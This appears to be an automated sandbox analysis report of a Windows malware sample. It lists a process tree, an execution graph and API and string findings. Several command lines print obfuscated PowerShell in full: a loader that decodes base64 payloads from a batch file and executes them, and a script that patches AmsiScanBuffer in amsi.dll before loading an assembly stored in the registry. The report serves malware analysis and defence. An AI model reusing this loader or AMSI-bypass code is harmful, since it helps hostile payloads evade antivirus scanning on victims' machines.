$DNWGy;$YMRTG=[System.IO.File]::ReadAllText($DNWGy).Split([Environment]::NewLine);foreach ($kGLHr in $YMRTG) { if ($kGLHr.StartsWith(':: ')) { $qObbT=$kGLHr.Substring(3); break; }}$UCMwf=[string[]]$qObbT.Split('\');Invoke-Expression '$oOAsD=hCkUZ (nTIwb (oni[oniConiooninonivonieonironitoni]oni:oni:oniFonironioonimoniBoniaonisonieoni6oni4oniSonitonironiioninonigoni($UCMwf[0])));'.Replace('oni', '');Invoke-Expression '$OwBFa=hCkUZ (nTIwb (oni[oniConiooninonivonieonironitoni]oni:oni:oniFonironioonimoniBoniaonisonieoni6oni4oniSonitonironiioninonigoni($UCMwf[1])));'.Replace('oni', '');uFDAH $oOAsD $null;uFDAH $OwBFa (,[string[]] (''));
                        Imagebase:0x7ff734a20000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:28
                        Start time:07:22:30
                        Start date:26/09/2024
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:powershell.exe -WindowStyle Hidden
                        Imagebase:0x7ff741d30000
                        File size:452'608 bytes
                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:false

                        Target ID:29
                        Start time:07:22:38
                        Start date:26/09/2024
                        Path:C:\Windows\System32\schtasks.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\System32\schtasks.exe" /Delete /TN "$cnt-CNT1" /F
                        Imagebase:0x7ff7031e0000
                        File size:235'008 bytes
                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:30
                        Start time:07:22:38
                        Start date:26/09/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff75da10000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:31
                        Start time:07:22:42
                        Start date:26/09/2024
                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
                        Imagebase:0xff0000
                        File size:433'152 bytes
                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:32
                        Start time:07:22:42
                        Start date:26/09/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff75da10000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:33
                        Start time:07:22:42
                        Start date:26/09/2024
                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
                        Imagebase:0xff0000
                        File size:433'152 bytes
                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:34
                        Start time:07:22:43
                        Start date:26/09/2024
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:oxbNdIdJMSmp{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$KEMhNhDQCLRUNV,[Parameter(Position=1)][Type]$HGdpxLKyUQ)$khFifhQytpa=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+'f'+''+[Char](108)+''+'e'+'c'+'t'+'e'+'d'+''+[Char](68)+''+[Char](101)+'l'+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+''+'M'+'e'+[Char](109)+''+'o'+''+[Char](114)+''+'y'+''+'M'+''+[Char](111)+''+'d'+''+[Char](117)+'le',$False).DefineType(''+[Char](77)+'yD'+'e'+''+'l'+''+[Char](101)+''+'g'+'a'+[Char](116)+''+[Char](101)+''+'T'+''+'y'+''+'p'+''+'e'+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+'P'+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+'c'+''+','+''+[Char](83)+'e'+[Char](97)+'l'+'e'+''+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+''+'s'+''+'i'+'C'+[Char](108)+'a'+[Char](115)+''+'s'+''+','+''+'A'+''+[Char](117)+'t'+[Char](111)+'Cla'+[Char](115)+''+'s'+'',[MulticastDelegate]);$khFifhQytpa.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+'p'+[Char](101)+'c'+[Char](105)+'al'+[Char](78)+''+'a'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+'S'+''+[Char](105)+''+'g'+','+'P'+'u'+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$KEMhNhDQCLRUNV).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+'t'+''+'i'+''+[Char](109)+''+'e'+''+[Char](44)+'M'+'a'+''+'n'+'ag'+'e'+''+[Char](100)+'');$khFifhQytpa.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+'o'+''+'k'+''+[Char](101)+'',''+[Char](80)+'u'+[Char](98)+'l'+'i'+''+[Char](99)+''+[Char](44)+'H'+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+''+'i'+''+[Char](103)+',N'+'e'+''+[Char](119)+'S'+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+'V'+''+[Char](105)+'r'+[Char](116)+'ua'+[Char](108)+'',$HGdpxLKyUQ,$KEMhNhDQCLRUNV).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+[Char](116)+'i'+'m'+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+'n'+'a'+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $khFifhQytpa.CreateType();}$KRrkXMMJHQAWa=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+'ll')}).GetType(''+'M'+''+'i'+''+'c'+''+'r'+'o'+[Char](115)+''+'o'+''+[Char](102)+''+[Char](116)+'.'+[Char](87)+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+'.Un'+[Char](115)+'a'+'f'+''+'e'+'N'+[Char](97)+''+[Char](116)+''+'i'+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+'t'+''+[Char](104)+''+'o'+''+'d'+''+'s'+'');$doZKqFPbZxNLSh=$KRrkXMMJHQAWa.GetMethod(''+[Char](71)+'et'+[Char](80)+''+'r'+''+'o'+''+[Char](99)+''+[Char](65)+'ddre'+[Char](115)+'s',[Reflection.BindingFlags]('P'+[Char](117)+'bli'+[Char](99)+','+[Char](83)+''+[Char](116)+'a'+'t'+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$MlhLFxQWSgAKoXShnVb=oxbNdIdJMSmp @([String])([IntPtr]);$VJNyACbUNbdCoehksOpZGU=oxbNdIdJMSmp @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$YJrcNCzTvEU=$KRrkXMMJHQAWa.GetMethod(''+[Char](71)+''+[Char](101)+'t'+[Char](77)+''+'o'+''+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+''+[Char](72)+''+'a'+'n'+[Char](100)+''+'l'+''+'e'+'').Invoke($Null,@([Object]('k'+'e'+''+'r'+''+[Char](110)+''+[Char](101)+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'')));$IHAbcsfdEtkEyD=$doZKqFPbZxNLSh.Invoke($Null,@([Object]$YJrcNCzTvEU,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+'d'+'L'+[Char](105)+'b'+[Char](114)+''+'a'+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$QNPqhRmAgVHBRCOcZ=$doZKqFPbZxNLSh.Invoke($Null,@([Object]$YJrcNCzTvEU,[Object](''+[Char](86)+''+'i'+'r'+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+'P'+''+'r'+''+[Char](111)+''+'t'+''+[Char](101)+''+[Char](99)+'t')));$NjQOgbk=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IHAbcsfdEtkEyD,$MlhLFxQWSgAKoXShnVb).Invoke(''+[Char](97)+'m'+'s'+''+[Char](105)+''+[Char](46)+'d'+'l'+''+'l'+'');$tHbMpbZeVqMdjOqLT=$doZKqFPbZxNLSh.Invoke($Null,@([Object]$NjQOgbk,[Object](''+'A'+''+[Char](109)+''+[Char](115)+'i'+[Char](83)+''+[Char](99)+''+'a'+'n'+'B'+'uff'+[Char](101)+''+'r'+'')));$dMXDRTQmEn=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($QNPqhRmAgVHBRCOcZ,$VJNyACbUNbdCoehksOpZGU).Invoke($tHbMpbZeVqMdjOqLT,[uint32]8,4,[ref]$dMXDRTQmEn);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$tHbMpbZeVqMdjOqLT,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($QNPqhRmAgVHBRCOcZ,$VJNyACbUNbdCoehksOpZGU).Invoke($tHbMpbZeVqMdjOqLT,[uint32]8,0x20,[ref]$dMXDRTQmEn);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+'F'+'T'+[Char](87)+'A'+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](99)+''+'n'+'t'+[Char](45)+'s'+[Char](116)+'a'+'g'+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"
                        Imagebase:0x7ff741d30000
                        File size:452'608 bytes
                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:35
                        Start time:07:22:44
                        Start date:26/09/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff75da10000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:37
                        Start time:07:22:45
                        Start date:26/09/2024
                        Path:C:\Windows\System32\dllhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\dllhost.exe /Processid:{613480bb-0e59-44d7-94a6-0c4ff8614e86}
                        Imagebase:0x7ff7d8730000
                        File size:21'312 bytes
                        MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:false

                        Target ID:38
                        Start time:07:22:46
                        Start date:26/09/2024
                        Path:C:\Windows\System32\winlogon.exe
                        Wow64 process (32bit):false
                        Commandline:winlogon.exe
                        Imagebase:0x7ff6fc1b0000
                        File size:906'240 bytes
                        MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:false

                        Target ID:39
                        Start time:07:22:46
                        Start date:26/09/2024
                        Path:C:\Windows\System32\lsass.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\lsass.exe
                        Imagebase:0x7ff6d9390000
                        File size:59'456 bytes
                        MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:false

                        Target ID:40
                        Start time:07:22:47
                        Start date:26/09/2024
                        Path:C:\Windows\System32\svchost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                        Imagebase:0x7ff7b4ee0000
                        File size:55'320 bytes
                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:false

                        Target ID:41
                        Start time:07:22:48
                        Start date:26/09/2024
                        Path:C:\Windows\System32\dwm.exe
                        Wow64 process (32bit):false
                        Commandline:"dwm.exe"
                        Imagebase:0x7ff74b010000
                        File size:94'720 bytes
                        MD5 hash:5C27608411832C5B39BA04E33D53536C
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:false

                        Target ID:42
                        Start time:07:22:48
                        Start date:26/09/2024
                        Path:C:\Windows\System32\svchost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                        Imagebase:0x7ff7b4ee0000
                        File size:55'320 bytes
                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:false

                        Target ID:43
                        Start time:07:22:48
                        Start date:26/09/2024
                        Path:C:\Windows\System32\svchost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                        Imagebase:0x7ff7b4ee0000
                        File size:55'320 bytes
                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:false

                        Target ID:44
                        Start time:07:22:49
                        Start date:26/09/2024
                        Path:C:\Windows\System32\svchost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                        Imagebase:0x7ff7b4ee0000
                        File size:55'320 bytes
                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:false

                        Target ID:45
                        Start time:07:22:50
                        Start date:26/09/2024
                        Path:C:\Windows\System32\svchost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                        Imagebase:0x7ff7b4ee0000
                        File size:55'320 bytes
                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:false

                        Target ID:46
                        Start time:07:22:50
                        Start date:26/09/2024
                        Path:C:\Windows\System32\svchost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                        Imagebase:0x7ff7b4ee0000
                        File size:55'320 bytes
                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:false

                        Target ID:47
                        Start time:07:22:51
                        Start date:26/09/2024
                        Path:C:\Windows\System32\svchost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                        Imagebase:0x7ff7b4ee0000
                        File size:55'320 bytes
                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:false

                        Target ID:48
                        Start time:07:22:51
                        Start date:26/09/2024
                        Path:C:\Windows\System32\svchost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                        Imagebase:0x7ff7b4ee0000
                        File size:55'320 bytes
                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:false

                        Target ID:49
                        Start time:07:22:52
                        Start date:26/09/2024
                        Path:C:\Windows\System32\svchost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                        Imagebase:0x7ff7b4ee0000
                        File size:55'320 bytes
                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                        Has elevated privileges:true
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:false

                        Target ID:50
                        Start time:07:22:53
                        Start date:26/09/2024
                        Path:C:\Windows\System32\svchost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                        Imagebase:0x7ff7b4ee0000
                        File size:55'320 bytes
                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                        Has elevated privileges:true
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:false

                        Target ID:51
                        Start time:07:22:54
                        Start date:26/09/2024
                        Path:C:\Windows\System32\svchost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                        Imagebase:0x7ff7b4ee0000
                        File size:55'320 bytes
                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                        Has elevated privileges:true
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:false

                        Target ID:52
                        Start time:07:22:55
                        Start date:26/09/2024
                        Path:C:\Windows\System32\svchost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                        Imagebase:0x7ff7b4ee0000
                        File size:55'320 bytes
                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                        Has elevated privileges:true
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:false

                        Target ID:53
                        Start time:07:22:55
                        Start date:26/09/2024
                        Path:C:\Windows\System32\svchost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                        Imagebase:0x7ff7b4ee0000
                        File size:55'320 bytes
                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                        Has elevated privileges:true
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:false

                        Target ID:54
                        Start time:07:22:56
                        Start date:26/09/2024
                        Path:C:\Windows\System32\svchost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                        Imagebase:0x7ff7b4ee0000
                        File size:55'320 bytes
                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:false

                        Target ID:55
                        Start time:07:22:56
                        Start date:26/09/2024
                        Path:C:\Windows\System32\svchost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\svchost.exe -k LocalService -p
                        Imagebase:0x7ff7b4ee0000
                        File size:55'320 bytes
                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                        Has elevated privileges:true
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:false

                        Target ID:56
                        Start time:07:22:56
                        Start date:26/09/2024
                        Path:C:\Windows\System32\svchost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                        Imagebase:0x7ff7b4ee0000
                        File size:55'320 bytes
                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:false

                        Target ID:57
                        Start time:07:22:58
                        Start date:26/09/2024
                        Path:C:\Windows\System32\svchost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                        Imagebase:0x7ff7b4ee0000
                        File size:55'320 bytes
                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                        Has elevated privileges:true
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:false

                        Target ID:627
                        Start time:07:23:07
                        Start date:26/09/2024
                        Path:C:\Windows\System32\Conhost.exe
                        Wow64 process (32bit):
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:
                        Has administrator privileges:
                        Programmed in:C, C++ or other language
                        Has exited:false

                        Target ID:643
                        Start time:07:23:16
                        Start date:26/09/2024
                        Path:C:\Windows\System32\Conhost.exe
                        Wow64 process (32bit):
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:
                        Has administrator privileges:
                        Programmed in:C, C++ or other language
                        Has exited:false

                        Reset < >

                          Execution Graph

                          Execution Coverage:1%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:2.6%
                          Total number of Nodes:116
                          Total number of Limit Nodes:7
                          execution_graph 14946 1f1197d1e3c LoadLibraryA GetProcAddress 14947 1f1197d1e6f 14946->14947 14948 1f1197d1e62 SleepEx 14946->14948 14948->14948 16806 1f1197d27e8 16807 1f1197d2867 16806->16807 16808 1f1197d28c9 GetFileType 16807->16808 16820 1f1197d2998 16807->16820 16809 1f1197d28ed 16808->16809 16810 1f1197d28d7 StrCpyW 16808->16810 16822 1f1197d1ad4 GetFinalPathNameByHandleW 16809->16822 16811 1f1197d28fc 16810->16811 16814 1f1197d2906 16811->16814 16816 1f1197d299d 16811->16816 16813 1f1197d3f88 StrCmpNIW 16813->16816 16814->16820 16827 1f1197d3f88 16814->16827 16830 1f1197d3708 StrCmpIW 16814->16830 16834 1f1197d1dd4 16814->16834 16816->16813 16817 1f1197d3708 4 API calls 16816->16817 16818 1f1197d1dd4 2 API calls 16816->16818 16816->16820 16817->16816 16818->16816 16823 1f1197d1afe StrCmpNIW 16822->16823 16824 1f1197d1b3d 16822->16824 16823->16824 16825 1f1197d1b18 lstrlenW 16823->16825 16824->16811 16825->16824 16826 1f1197d1b2a StrCpyW 16825->16826 16826->16824 16828 1f1197d3faa 16827->16828 16829 1f1197d3f95 StrCmpNIW 16827->16829 16828->16814 16829->16828 16831 1f1197d373a StrCpyW StrCatW 16830->16831 16832 1f1197d3751 PathCombineW 16830->16832 16833 1f1197d375a 16831->16833 16832->16833 16833->16814 16835 1f1197d1df4 16834->16835 16836 1f1197d1deb 16834->16836 16835->16814 16837 1f1197d1530 2 API calls 16836->16837 16837->16835 14961 1f1197d1bc4 14968 1f1197d1724 GetProcessHeap HeapAlloc 14961->14968 14963 1f1197d1bd3 14964 1f1197d1bda SleepEx 14963->14964 14967 1f1197d159c StrCmpIW StrCmpW 14963->14967 15019 1f1197d19b0 14963->15019 14965 1f1197d1724 50 API calls 14964->14965 14965->14963 14967->14963 15036 1f1197d1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14968->15036 14970 1f1197d174c 15037 1f1197d1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14970->15037 14972 1f1197d1754 15038 1f1197d1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14972->15038 14974 1f1197d175d 15039 1f1197d1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14974->15039 14976 1f1197d1766 15040 1f1197d1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14976->15040 14978 1f1197d176f 15041 1f1197d1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14978->15041 14980 1f1197d1778 15042 1f1197d1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14980->15042 14982 1f1197d1781 15043 1f1197d1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14982->15043 14984 1f1197d178a RegOpenKeyExW 14985 1f1197d17bc RegOpenKeyExW 14984->14985 14986 1f1197d19a2 14984->14986 14987 1f1197d17fb RegOpenKeyExW 14985->14987 14988 1f1197d17e5 14985->14988 14986->14963 14990 1f1197d181f 14987->14990 14991 1f1197d1836 RegOpenKeyExW 14987->14991 15044 1f1197d12b8 RegQueryInfoKeyW 14988->15044 15053 1f1197d104c RegQueryInfoKeyW 14990->15053 14994 1f1197d185a 14991->14994 14995 1f1197d1871 RegOpenKeyExW 14991->14995 14997 1f1197d12b8 16 API calls 14994->14997 14998 1f1197d18ac RegOpenKeyExW 14995->14998 14999 1f1197d1895 14995->14999 15002 1f1197d1867 RegCloseKey 14997->15002 15000 1f1197d18d0 14998->15000 15001 1f1197d18e7 RegOpenKeyExW 14998->15001 15003 1f1197d12b8 16 API calls 14999->15003 15005 1f1197d12b8 16 API calls 15000->15005 15006 1f1197d190b 15001->15006 15007 1f1197d1922 RegOpenKeyExW 15001->15007 15002->14995 15004 1f1197d18a2 RegCloseKey 15003->15004 15004->14998 15008 1f1197d18dd RegCloseKey 15005->15008 15009 1f1197d104c 6 API calls 15006->15009 15010 1f1197d195d RegOpenKeyExW 15007->15010 15011 1f1197d1946 15007->15011 15008->15001 15012 1f1197d1918 RegCloseKey 15009->15012 15014 1f1197d1998 RegCloseKey 15010->15014 15015 1f1197d1981 15010->15015 15013 1f1197d104c 6 API calls 15011->15013 15012->15007 15016 1f1197d1953 RegCloseKey 15013->15016 15014->14986 15017 1f1197d104c 6 API calls 15015->15017 15016->15010 15018 1f1197d198e RegCloseKey 15017->15018 15018->15014 15063 1f1197d14a0 15019->15063 15036->14970 15037->14972 15038->14974 15039->14976 15040->14978 15041->14980 15042->14982 15043->14984 15045 1f1197d1486 RegCloseKey 15044->15045 15046 1f1197d1323 GetProcessHeap HeapAlloc 15044->15046 15045->14987 15047 1f1197d134e RegEnumValueW 15046->15047 15048 1f1197d1472 GetProcessHeap HeapFree 15046->15048 15050 1f1197d13a1 15047->15050 15048->15045 15050->15047 15050->15048 15051 1f1197d13cf GetProcessHeap HeapAlloc GetProcessHeap HeapFree 15050->15051 15052 1f1197d141a lstrlenW GetProcessHeap HeapAlloc StrCpyW 15050->15052 15058 1f1197d1530 15050->15058 15051->15052 15052->15050 15054 1f1197d11b5 RegCloseKey 15053->15054 15056 1f1197d10bf 15053->15056 15054->14991 15055 1f1197d10cf RegEnumValueW 15055->15056 15056->15054 15056->15055 15057 1f1197d114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 15056->15057 15057->15056 15059 1f1197d1580 15058->15059 15060 1f1197d154a 15058->15060 15059->15050 15060->15059 15061 1f1197d1569 StrCmpW 15060->15061 15062 1f1197d1561 StrCmpIW 15060->15062 15061->15060 15062->15060 15064 1f1197d14e2 GetProcessHeap HeapFree GetProcessHeap HeapFree 15063->15064 15065 1f1197d14c2 GetProcessHeap HeapFree 15063->15065 15065->15064 15065->15065 14934 1f1197df6a0 14945 1f1197dc558 EnterCriticalSection 14934->14945 14936 1f1197df6b0 14937 1f1197e1c5c 39 API calls 14936->14937 14938 1f1197df6b9 14937->14938 14939 1f1197df6c7 14938->14939 14940 1f1197df498 41 API calls 14938->14940 14941 1f1197dc5ac Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 14939->14941 14942 1f1197df6c2 14940->14942 14943 1f1197df6d3 14941->14943 14944 1f1197df598 GetStdHandle GetFileType 14942->14944 14944->14939

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true
                          • Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProcSleep
                          • String ID: AmsiScanBuffer$amsi.dll
                          • API String ID: 188063004-3248079830
